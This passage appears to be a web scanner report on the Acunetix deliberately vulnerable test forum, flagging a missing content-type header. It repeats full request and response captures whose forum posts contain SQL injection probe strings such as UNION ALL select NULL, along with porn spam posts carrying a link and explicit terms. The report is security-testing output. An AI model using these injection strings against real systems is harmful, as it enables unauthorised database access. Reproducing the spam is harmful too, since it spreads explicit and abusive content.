10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4132 |
| Response Body - size: 4,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4440 |
| Response Body - size: 4,440 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4502 |
| Response Body - size: 4,502 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div 